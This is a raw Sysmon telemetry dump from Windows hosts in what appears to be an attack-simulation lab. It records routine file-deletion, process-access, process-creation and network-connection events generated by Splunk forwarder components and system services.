23542300x8000000000000000299081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:48.542{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=304C472A7F64A722568183A948957CC2,SHA256=1B7F5E909B4E49F9621C44B16CF33ED53A4291838CDCC78A2C7F7028B69FE43E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-19BC-6216-5205-000000003902}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19BC-6216-5205-000000003902}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.994{4F8D34B0-19BC-6216-5205-000000003902}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000222947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.201{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51751-false10.0.1.12-8089- 354300x8000000000000000299083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:47.504{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49586-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:49.573{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB0F2AF771DF69B3CEC4245C579ABC20,SHA256=13612BA62F80E2EE793D5D11F3844DB31142AB4C3C8FCB9211360410A66F77B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19BD-6216-5305-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-19BD-6216-5305-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.885{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19BD-6216-5305-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 